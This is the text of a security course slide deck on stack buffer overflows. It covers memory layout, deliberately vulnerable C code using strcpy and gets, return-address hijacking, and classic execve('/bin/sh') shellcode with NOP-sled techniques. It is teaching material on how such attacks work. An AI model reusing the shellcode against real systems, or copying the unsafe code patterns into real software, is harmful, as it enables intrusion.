Buffer Overflow Attacks - PowerPoint PPT Presentation
1 / 67
Title:
Buffer Overflow Attacks
Description:
Buffer Overflow Attacks – PowerPoint PPT presentation
Number of Views:61
Avg rating:3.0/5.0
Title: Buffer Overflow Attacks
1
Buffer Overflow Attacks
6.857, Computer Network Security
Basic Idea Sample Attacks
Protection
1
6.857
2
History
6.857, Computer Network Security
Basic Idea Sample Attacks
Protection
1960s
1970s
1990s
Today
1980s
The problem persists(e.g., IE VML advisory
fromtwo months ago).
Vulnerability exploited on time-share machines
Morris Worm usesbuffer overflow intaking down
significantportion of the Internet
Attacks on early networkedmachines
Buffer overflow attacks become(arguably) the
most pressingsecurity concerns facing the
web(e..g., in 1998, 2/3 of CERT advisorieswere
buffer overflow related)
2
6.857
3
Memory Layout
6.857, Computer Network Security
Basic Idea Sample Attacks
Protection
Low Addresses
Text
Data
Heap
Stack
High Addresses
3
6.857
4
Memory Layout
6.857, Computer Network Security
Basic Idea Sample Attacks
Protection
Low Addresses
Text
void func(int a, int b) char
buffer10 void main() func(1,2)
Data
Heap
Stack
High Addresses
4
6.857
5
Memory Layout
6.857, Computer Network Security
Basic Idea Sample Attacks
Protection
Low Addresses
Text
pushl 2pushl 1call funcpushl ebpmovl
esp, ebpsubl 24, esp
void func(int a, int b) char
buffer10 void main() func(1,2)
Data
Heap
Stack
High Addresses
5
6.857
6
Memory Layout
6.857, Computer Network Security
Basic Idea Sample Attacks
Protection
Low Addresses
Text
pushl 2pushl 1call funcpushl ebpmovl
esp, ebpsubl 24, esp
void func(int a, int b) char
buffer10 void main() func(1,2)
Data
Heap
sp
Stack
fp
High Addresses
6
6.857
7
Memory Layout
6.857, Computer Network Security
Basic Idea Sample Attacks
Protection
Low Addresses
Text
pushl 2pushl 1call funcpushl ebpmovl
esp, ebpsubl 24, esp
void func(int a, int b) char
buffer10 void main() func(1,2)
Data
Heap
sp
Stack
2
fp
High Addresses
7
6.857
8
Memory Layout
6.857, Computer Network Security
Basic Idea Sample Attacks
Protection
Low Addresses
Text
pushl 2pushl 1call funcpushl ebpmovl
esp, ebpsubl 24, esp
void func(int a, int b) char
buffer10 void main() func(1,2)
Data
Heap
1
sp
Stack
2
fp
High Addresses
8
6.857
9
Memory Layout
6.857, Computer Network Security
Basic Idea Sample Attacks
Protection
Low Addresses
Text
pushl 2pushl 1call funcpushl ebpmovl
esp, ebpsubl 24, esp
void func(int a, int b) char
buffer10 void main() func(1,2)
Data
Heap
ret
1
sp
Stack
2
fp
High Addresses
9
6.857
10
Memory Layout
6.857, Computer Network Security
Basic Idea Sample Attacks
Protection
Low Addresses
Text
pushl 2pushl 1call funcpushl ebpmovl
esp, ebpsubl 24, esp
void func(int a, int b) char
buffer10 void main() func(1,2)
Data
Heap
sfp
ret
1
sp
Stack
2
fp
High Addresses
10
6.857
11
Memory Layout
6.857, Computer Network Security
Basic Idea Sample Attacks
Protection
Low Addresses
Text
pushl 2pushl 1call funcpushl ebpmovl
esp, ebpsubl 24, esp
void func(int a, int b) char
buffer10 void main() func(1,2)
Data
Heap
sfp
ret
1
sp
Stack
2
fp
High Addresses
11
6.857
12
Memory Layout
6.857, Computer Network Security
Basic Idea Sample Attacks
Protection
Low Addresses
Text
pushl 2pushl 1call funcpushl ebpmovl
esp, ebpsubl 24, esp
void func(int a, int b) char
buffer10 void main() func(1,2)
Data
Heap
sfp
ret
1
sp
Stack
2
fp
High Addresses
12
6.857
13
Memory Layout
6.857, Computer Network Security
Basic Idea Sample Attacks
Protection
Low Addresses
Text
pushl 2pushl 1call funcpushl ebpmovl
esp, ebpsubl 24, esp
void func(int a, int b) char
buffer10 void main() func(1,2)
Data
Heap
buffer
sfp
ret
1
sp
Stack
2
fp
High Addresses
13
6.857
14
Memory Layout
6.857, Computer Network Security
Basic Idea Sample Attacks
Protection
Low Addresses
Text
void func(int a, int b) char buffer10
strcpy(buffer, bigstr)
Data
Heap
buffer
sfp
ret
1
sp
Stack
2
fp
High Addresses
14
6.857
15
Memory Layout
6.857, Computer Network Security
Basic Idea Sample Attacks
Protection
Low Addresses
Text
void func(int a, int b) char buffer10
strcpy(buffer, bigstr)
Data
Heap
bigstr
sfp
ret
1
sp
Stack
2
fp
High Addresses
15
6.857
16
Sample Attacks
6.857, Computer Network Security
Basic Idea Sample Attacks
Protection
- Modify local variables
- Modify return address to skip/repeat code
- Modify return address to run evil code
16
6.857
17
Modify Local Variables
6.857, Computer Network Security
Basic Idea Sample Attacks
Protection
- Modify local variables
- Modify return address to skip/repeat code
- Modify return address to run evil code
17
6.857
18
Modify Local Variables
6.857, Computer Network Security
Basic Idea Sample Attacks
Protection
void handleRequest() int code char
subject "SECRET user request" char
recp "admin_at_nsa.gov" char query8
strcpy(query, getenv("QUERY_STRING")) //send
top secret e-mail to recp
18
6.857
19
Modify Local Variables
6.857, Computer Network Security
Basic Idea Sample Attacks
Protection
void handleRequest() int code char
subject "SECRET user request" char
recp "admin_at_nsa.gov" char query8
strcpy(query, getenv("QUERY_STRING")) //send
top secret e-mail to recp
query
recp
subject
sfp
ret
19
6.857
20
Modify Local Variables
6.857, Computer Network Security
Basic Idea Sample Attacks
Protection
void handleRequest() int code char
subject "SECRET user request" char
recp "admin_at_nsa.gov" char query8
strcpy(query, getenv("QUERY_STRING")) //send
top secret e-mail to recp
query
recp
subject
sfp
ret
20
6.857
21
Modify Local Variables
6.857, Computer Network Security
Basic Idea Sample Attacks
Protection
void handleRequest() int code char
subject "SECRET user request" char
recp "admin_at_nsa.gov" char query8
strcpy(query, getenv("QUERY_STRING")) //send
top secret e-mail to recp
query
recp
subject
sfp
ret
21
6.857
22
Modify Local Variables
6.857, Computer Network Security
Basic Idea Sample Attacks
Protection
void handleRequest() int code char
subject "SECRET user request" char
recp "admin_at_nsa.gov" char query8
strcpy(query, getenv("QUERY_STRING")) //send
top secret e-mail to recp
query
recp
subject
Demo
sfp
ret
22
6.857
23
Repeat Code
6.857, Computer Network Security
Basic Idea Sample Attacks
Protection
- Modify local variables
- Modify return address to skip/repeat code
- Modify return address to run evil code
23
6.857
24
Repeat Code
6.857, Computer Network Security
Basic Idea Sample Attacks
Protection
void func(int a, int b) printf("Inside func
loop.\n") char buffer4 gets(buffer) ma
in() printf("about to call func.\n")
func(5,6) printf("done.\n")
buffer
sfp
ret
a
b
24
6.857
25
Repeat Code
6.857, Computer Network Security
Basic Idea Sample Attacks
Protection
void func(int a, int b) printf("Inside func
loop.\n") char buffer4 gets(buffer) ma
in() printf("about to call func.\n")
func(5,6) printf("done.\n")
buffer
sfp
ret
a
b
25
6.857
26
Repeat Code
6.857, Computer Network Security
Basic Idea Sample Attacks
Protection
void func(int a, int b) printf("Inside func
loop.\n") char buffer4 gets(buffer) ma
in() printf("about to call func.\n")
func(5,6) printf("done.\n")
sfp
ret
addr
a
b
26
6.857
27
Repeat Code
6.857, Computer Network Security
Basic Idea Sample Attacks
Protection
void func(int a, int b) printf("Inside func
loop.\n") char buffer4 gets(buffer) ma
in() printf("about to call func.\n")
func(5,6) printf("done.\n")
buffer
sfp
ret
a
b
27
6.857
28
Repeat Code
6.857, Computer Network Security
Basic Idea Sample Attacks
Protection
void func(int a, int b) printf("Inside func
loop.\n") char buffer4 gets(buffer) ma
in() printf("about to call func.\n")
func(5,6) printf("done.\n")
sfp
ret
addr
a
b
28
6.857
29
Repeat Code
6.857, Computer Network Security
Basic Idea Sample Attacks
Protection
void func(int a, int b) printf("Inside func
loop.\n") char buffer4 gets(buffer) ma
in() printf("about to call func.\n")
func(5,6) printf("done.\n")
sfp
ret
addr
a
b
Demo
29
6.857
30
Sample Attacks
6.857, Computer Network Security
Basic Idea Sample Attacks
Protection
- Modify local variables
- Modify return address to skip/repeat code
- Modify return address to run evil code
30
6.857
31
Running Evil Code
6.857, Computer Network Security
Basic Idea Sample Attacks
Protection
buffer
void func(int a, int b) char buffer32
gets(buffer)
sfp
ret
1
2
31
6.857
32
Running Evil Code
6.857, Computer Network Security
Basic Idea Sample Attacks
Protection
evil codeevil codeevil codeevil
code nopnopnopnopnopnopnopnopnopnopnop0
x80483eb
void func(int a, int b) char buffer32
gets(buffer)
1
2
32
6.857
33
Running Evil Code
6.857, Computer Network Security
Basic Idea Sample Attacks
Protection
evil codeevil codeevil codeevil
code nopnopnopnopnopnopnopnopnopnopnop0
x80483eb
void func(int a, int b) char buffer32
gets(buffer)
1
2
33
6.857
34
Running Evil Code
6.857, Computer Network Security
Basic Idea Sample Attacks
Protection
evil codeevil codeevil codeevil
code nopnopnopnopnopnopnopnopnopnopnop0
x80483eb
void func(int a, int b) char buffer32
gets(buffer)
1
2
34
6.857
35
Running Evil Code
6.857, Computer Network Security
Basic Idea Sample Attacks
Protection
evil codeevil codeevil codeevil
code nopnopnopnopnopnopnopnopnopnopnop0
x80483eb
void func(int a, int b) char buffer32
gets(buffer)
1
2
35
6.857
36
Running Evil Code
6.857, Computer Network Security
Basic Idea Sample Attacks
Protection
evil codeevil codeevil codeevil
code nopnopnopnopnopnopnopnopnopnopnop0
x80483eb
void func(int a, int b) char buffer32
gets(buffer)
????
1
2
36
6.857
37
Running Evil Code
6.857, Computer Network Security
Basic Idea Sample Attacks
Protection
void main() char name2 name0
"/bin/sh" name1 NULL execve(name0,
name, NULL)
37
6.857
38
Running Evil Code
6.857, Computer Network Security
Basic Idea Sample Attacks
Protection
void main() char name2 name0
"/bin/sh" name1 NULL execve(name0,
name, NULL)
movl 0x80884a8,0xfffffff8(ebp) movl
0x0,0xfffffffc(ebp) push 0x0 lea
0xfffffff8(ebp),eax push eax pushl
0xfffffff8(ebp) call 0x804d880 ltexecvegt
38
6.857
39
Running Evil Code
6.857, Computer Network Security
Basic Idea Sample Attacks
Protection
void main() char name2 name0
"/bin/sh" name1 NULL execve(name0,
name, NULL)
movl 0x80884a8,0xfffffff8(ebp) movl
0x0,0xfffffffc(ebp) push 0x0 lea
0xfffffff8(ebp),eax push eax pushl
0xfffffff8(ebp) call 0x804d880 ltexecvegt
0xffffffff
39
6.857
40
Running Evil Code
6.857, Computer Network Security
Basic Idea Sample Attacks
Protection
void main() char name2 name0
"/bin/sh" name1 NULL execve(name0,
name, NULL)
movl 0x80884a8,0xfffffff8(ebp) movl
0x0,0xfffffffc(ebp) push 0x0 lea
0xfffffff8(ebp),eax push eax pushl
0xfffffff8(ebp) call 0x804d880 ltexecvegt
0xfffffff8
0x80884a8
0xffffffff
40
6.857
/bin/sh
41
Running Evil Code
6.857, Computer Network Security
Basic Idea Sample Attacks
Protection
void main() char name2 name0
"/bin/sh" name1 NULL execve(name0,
name, NULL)
movl 0x80884a8,0xfffffff8(ebp) movl
0x0,0xfffffffc(ebp) push 0x0 lea
0xfffffff8(ebp),eax push eax pushl
0xfffffff8(ebp) call 0x804d880 ltexecvegt
0xfffffff8
0x80884a8
0xfffffffc
NULL
0xffffffff
41
6.857
42
Running Evil Code
6.857, Computer Network Security
Basic Idea Sample Attacks
Protection
void main() char name2 name0
"/bin/sh" name1 NULL execve(name0,
name, NULL)
movl 0x80884a8,0xfffffff8(ebp) movl
0x0,0xfffffffc(ebp) push 0x0 lea
0xfffffff8(ebp),eax push eax pushl
0xfffffff8(ebp) call 0x804d880 ltexecvegt
0xfffffff8
0x80884a8
0xfffffffc
NULL
0xffffffff
42
6.857
name
43
Running Evil Code
6.857, Computer Network Security
Basic Idea Sample Attacks
Protection
void main() char name2 name0
"/bin/sh" name1 NULL execve(name0,
name, NULL)
0x80884a8
movl 0x80884a8,0xfffffff8(ebp) movl
0x0,0xfffffffc(ebp) push 0x0 lea
0xfffffff8(ebp),eax push eax pushl
0xfffffff8(ebp) call 0x804d880 ltexecvegt
0xfffffff8
NULL
0xfffffff8
0x80884a8
0xfffffffc
NULL
0xffffffff
43
6.857
44
Running Evil Code
6.857, Computer Network Security
Basic Idea Sample Attacks
Protection
void main() char name2 name0
"/bin/sh" name1 NULL execve(name0,
name, NULL)
fp (ebp)
sfp
ret
0x80884a8
0xfffffff8
NULL
0xfffffff8
0x80884a8
0xfffffffc
NULL
0xffffffff
44
6.857
45
Running Evil Code
6.857, Computer Network Security
Basic Idea Sample Attacks
Protection
void main() char name2 name0
"/bin/sh" name1 NULL execve(name0,
name, NULL)
fp (ebp)
sfp
ret
ebx
0x80884a8
mov 0x8(ebp),ebx mov 0xc(ebp),ecx mov
0x10(ebp),edx mov 0xb,eax int 0x80
0xfffffff8
NULL
0xfffffff8
0x80884a8
0xfffffffc
NULL
0xffffffff
45
6.857
46
Running Evil Code
6.857, Computer Network Security
Basic Idea Sample Attacks
Protection
void main() char name2 name0
"/bin/sh" name1 NULL execve(name0,
name, NULL)
fp (ebp)
sfp
ret
ebx
0x80884a8
mov 0x8(ebp),ebx mov 0xc(ebp),ecx mov
0x10(ebp),edx mov 0xb,eax int 0x80
ecx
0xfffffff8
NULL
0xfffffff8
0x80884a8
0xfffffffc
NULL
0xffffffff
46
6.857
47
Running Evil Code
6.857, Computer Network Security
Basic Idea Sample Attacks
Protection
void main() char name2 name0
"/bin/sh" name1 NULL execve(name0,
name, NULL)
fp (ebp)
sfp
ret
ebx
0x80884a8
mov 0x8(ebp),ebx mov 0xc(ebp),ecx mov
0x10(ebp),edx mov 0xb,eax int 0x80
ecx
0xfffffff8
edx
NULL
0xfffffff8
0x80884a8
0xfffffffc
NULL
0xffffffff
47
6.857
48
Running Evil Code
6.857, Computer Network Security
Basic Idea Sample Attacks
Protection
void main() char name2 name0
"/bin/sh" name1 NULL execve(name0,
name, NULL)
fp (ebp)
sfp
ret
ebx
0x80884a8
mov 0x8(ebp),ebx mov 0xc(ebp),ecx mov
0x10(ebp),edx mov 0xb,eax int 0x80
ecx
0xfffffff8
edx
NULL
0xfffffff8
0x80884a8
0xfffffffc
NULL
0xffffffff
48
6.857
49
Running Evil Code
6.857, Computer Network Security
Basic Idea Sample Attacks
Protection
void main() char name2 name0
"/bin/sh" name1 NULL execve(name0,
name, NULL)
fp (ebp)
sfp
ret
ebx
0x80884a8
mov 0x8(ebp),ebx mov 0xc(ebp),ecx mov
0x10(ebp),edx mov 0xb,eax int 0x80
ecx
0xfffffff8
edx
NULL
0xfffffff8
0x80884a8
0xfffffffc
NULL
0xffffffff
49
6.857
50
Running Evil Code
6.857, Computer Network Security
Basic Idea Sample Attacks
Protection
movl string_addr,0x8 movl 0x0,0xc
movl 0xb,eax movl
string_addr,ebx leal 0x8,ecx
movl 0xc,edx int 0x80
fp (ebp)
sfp
ret
50
6.857
51
Running Evil Code
6.857, Computer Network Security
Basic Idea Sample Attacks
Protection
movl string_addr,0x8 movl 0x0,0xc
movl 0xb,eax movl
string_addr,ebx leal 0x8,ecx
movl 0xc,edx int 0x80
fp (ebp)
sfp
ret
ebx
0x8
string_addr
ecx
NULL
edx
51
6.857
52
Running Evil Code
6.857, Computer Network Security
Basic Idea Sample Attacks
Protection
movl string_addr,0x8 movl 0x0,0xc
movl 0xb,eax movl
string_addr,ebx leal 0x8,ecx
movl 0xc,edx int 0x80
??????
sfp
ret
string_addr
NULL
52
6.857
53
Running Evil Code
6.857, Computer Network Security
Basic Idea Sample Attacks
Protection
jmp offset-to-call popl esi movl
esi,0x8 movl 0x0,0xc movl
0xb,eax movl esi,ebx leal
0x8,ecx movl 0xc,edx
int 0x80 call offset-to-popl /bin/sh
string
sfp
ret
53
6.857
54
Running Evil Code
6.857, Computer Network Security
Basic Idea Sample Attacks
Protection
jmp offset-to-call popl esi movl
esi,0x8 movl 0x0,0xc movl
0xb,eax movl esi,ebx leal
0x8,ecx movl 0xc,edx
int 0x80 call offset-to-popl /bin/sh
string
code
bin/sh
sfp
ret
54
6.857
55
Running Evil Code
6.857, Computer Network Security
Basic Idea Sample Attacks
Protection
jmp offset-to-call popl esi movl
esi,0x8 movl 0x0,0xc movl
0xb,eax movl esi,ebx leal
0x8,ecx movl 0xc,edx
int 0x80 call offset-to-popl /bin/sh
string
code
bin/sh
sfp
ret
55
6.857
56
Running Evil Code
6.857, Computer Network Security
Basic Idea Sample Attacks
Protection
addr of bin/sh
jmp offset-to-call popl esi movl
esi,0x8 movl 0x0,0xc movl
0xb,eax movl esi,ebx leal
0x8,ecx movl 0xc,edx
int 0x80 call offset-to-popl /bin/sh
string
code
bin/sh
sfp
ret
56
6.857
57
Running Evil Code
6.857, Computer Network Security
Basic Idea Sample Attacks
Protection
esi
addr of bin/sh
jmp offset-to-call popl esi movl
esi,0x8 movl 0x0,0xc movl
0xb,eax movl esi,ebx leal
0x8,ecx movl 0xc,edx
int 0x80 call offset-to-popl /bin/sh
string
code
bin/sh
sfp
ret
57
6.857
58
Running Evil Code
6.857, Computer Network Security
Basic Idea Sample Attacks
Protection
jmp offset-to-call popl esi movl
esi,0x8 movl 0x0,0xc movl
0xb,eax movl esi,ebx leal
0x8,ecx movl 0xc,edx
int 0x80 call offset-to-popl /bin/sh
string
code
bin/sh
sfp
ret
58
6.857
59
Running Evil Code
6.857, Computer Network Security
Basic Idea Sample Attacks
Protection
jmp offset-to-call popl esi movl
esi,0x8 movl 0x0,0xc movl
0xb,eax movl esi,ebx leal
0x8,ecx movl 0xc,edx
int 0x80 call offset-to-popl /bin/sh
string
sfp
ret
Obstacle 1 Zero Bytes
59
6.857
60
Running Evil Code
6.857, Computer Network Security
Basic Idea Sample Attacks
Protection
jmp offset-to-call popl esi movl
esi,0x8 movl 0x0,0xc movl
0xb,eax movl esi,ebx leal
0x8,ecx movl 0xc,edx
int 0x80 call offset-to-popl /bin/sh
string
sfp
ret
Obstacle 1 Zero Bytes Solution Generate
on the fly(e.g., push 0x0
xor eax, eax push eax )
60
6.857
61
Running Evil Code
6.857, Computer Network Security
Basic Idea Sample Attacks
Protection
jmp offset-to-call popl esi movl
esi,0x8 movl 0x0,0xc movl
0xb,eax movl esi,ebx leal
0x8,ecx movl 0xc,edx
int 0x80 call offset-to-popl /bin/sh
string
code
retretretretretret
sfp
ret
Obstacle 2 Guessing the Return Address
61
6.857
62
Running Evil Code
6.857, Computer Network Security
Basic Idea Sample Attacks
Protection
jmp offset-to-call popl esi movl
esi,0x8 movl 0x0,0xc movl
0xb,eax movl esi,ebx leal
0x8,ecx movl 0xc,edx
int 0x80 call offset-to-popl /bin/sh
string
code
retretretretretret
sfp
ret
Obstacle 2 Guessing the Return Address
62
6.857
63
Running Evil Code
6.857, Computer Network Security
Basic Idea Sample Attacks
Protection
jmp offset-to-call popl esi movl
esi,0x8 movl 0x0,0xc movl
0xb,eax movl esi,ebx leal
0x8,ecx movl 0xc,edx
int 0x80 call offset-to-popl /bin/sh
string
code
retretretretretret
sfp
ret
Obstacle 2 Guessing the Return Address
63
6.857
64
Running Evil Code
6.857, Computer Network Security
Basic Idea Sample Attacks
Protection
nopnopnop
jmp offset-to-call popl esi movl
esi,0x8 movl 0x0,0xc movl
0xb,eax movl esi,ebx leal
0x8,ecx movl 0xc,edx
int 0x80 call offset-to-popl /bin/sh
string
code
retretretretretret
sfp
ret
Obstacle 2 Guessing the Return
AddressSolution Add a NOP landing pad
to increase the chance that
your guess is right.
64
6.857
65
Running Evil Code
6.857, Computer Network Security
Basic Idea Sample Attacks
Protection
nopnopnop
jmp offset-to-call popl esi movl
esi,0x8 movl 0x0,0xc movl
0xb,eax movl esi,ebx leal
0x8,ecx movl 0xc,edx
int 0x80 call offset-to-popl /bin/sh
string
code
retretretretretret
sfp
ret
Obstacle 2 Guessing the Return
AddressSolution Add a NOP landing pad
to increase the chance that
your guess is right.
65
6.857
66
Running Evil Code
6.857, Computer Network Security
Basic Idea Sample Attacks
Protection
nopnopnop
jmp offset-to-call popl esi movl
esi,0x8 movl 0x0,0xc movl
0xb,eax movl esi,ebx leal
0x8,ecx movl 0xc,edx
int 0x80 call offset-to-popl /bin/sh
string
code
retretretretretret
sfp
ret
Obstacle 2 Guessing the Return
AddressSolution Add a NOP landing pad
to increase the chance that
your guess is right.
66
6.857
67
Running Evil Code
6.857, Computer Network Security
Basic Idea Sample Attacks
Protection
nopnopnop
jmp offset-to-call popl esi movl
esi,0x8 movl 0x0,0xc movl
0xb,eax movl esi,ebx leal
0x8,ecx movl 0xc,edx
int 0x80 call offset-to-popl /bin/sh
string
code
retretretretretret
sfp
ret
Obstacle 2 Guessing the Return
AddressSolution Add a NOP landing pad
to increase the chance that
your guess is right.
67
6.857
Recommended
CrystalGraphics Presentations
